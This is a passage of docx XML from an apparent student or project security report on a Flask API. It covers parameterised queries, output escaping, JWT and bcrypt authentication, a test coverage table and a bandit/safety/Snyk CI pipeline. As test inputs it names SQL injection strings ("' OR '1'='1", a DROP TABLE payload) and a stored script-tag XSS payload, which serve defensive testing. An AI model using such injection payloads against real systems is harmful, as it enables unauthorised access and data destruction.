        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cursor = db.execute(</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "INSERT INTO posts (user_id, title, content) VALUES (?, ?, ?)",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    (g.current_user["id"], title, content),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The test suite verifies two cases: a login attempt with the payload "' OR '1'='1" returns 401, and a post whose content is "'; DROP TABLE posts; --" is stored as plain text and does not damage the schema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3.2  XSS protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All user-controlled values are escaped on output with Flask's built-in markupsafe.escape function. The seed data contains the stored payload &lt;script&gt;alert('stored-xss-demo')&lt;/script&gt;; GET /api/data returns it as &amp;lt;script&amp;gt;...&amp;lt;/script&amp;gt;, proving that the response is escaped. The create response is escaped with the same function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>from markupsafe import escape</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>def escape_text(value):</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    return str(escape(value))</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>def serialize_post(row):</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">        "title": escape_text(row["title"]),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">        "content": escape_text(row["content"]),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">        "author": escape_text(row["author"]),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3.3  Broken-authentication protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A successful login returns a JWT signed with HS256. The payload contains sub, username, iat and exp; the default lifetime is 60 minutes. Protected endpoints use a @token_required decorator that requires the "Authorization: Bearer &lt;token&gt;" header, decodes the token with the server secret, and returns 401 for missing, invalid or expired tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>payload = {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sub": str(user_id),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "username": username,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "iat": now,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "exp": now + timedelta(minutes=JWT_EXPIRES_MINUTES),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>token = jwt.encode(payload, JWT_SECRET, algorithm="HS256")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Passwords are hashed with bcrypt, which generates a unique salt for every password. The database stores only the bcrypt hash; a unit test reads the row back and confirms that it is not the plaintext password and that bcrypt.checkpw succeeds. Failed logins always return the same "invalid credentials" message to avoid username enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3.4  Secrets and configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JWT_SECRET and SECRET_KEY are read from environment variables only. The application refuses to start if no JWT secret is configured. The repository contains .env.example but no real secret, and .env is excluded by .gitignore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3.5  Automated tests</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val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Login success, wrong password, unknown user, SQL-injection payload, missing fields, bcrypt hash verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Missing token, invalid token, expired/invalid signature behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Data API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>List with token, create with token, input validation, author attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stored payload is escaped in both create and list responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Payload is stored literally and the table remains usable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Result: 14 pytest tests pass in the GitHub Actions pipeline and locally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>3.  CI/CD Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The workflow is defined in .github/workflows/ci.yml and runs on every push to the main branch and on pull requests. The main job installs the dependencies, runs the unit tests, performs SAST with bandit, performs SCA with safety, publishes a scan summary and uploads the reports. A second SCA job uses the Snyk CLI and runs the dependency scan when the SNYK_TOKEN secret is configured; without the token it skips the scan with an explicit notice so the test/SAST/SCA pipeline is not blocked.</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val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unit tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>pytest 8.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>14 tests passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>bandit 1.9.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reports/bandit.json, reports/bandit.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>safety 3.8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reports/safety.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Snyk CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
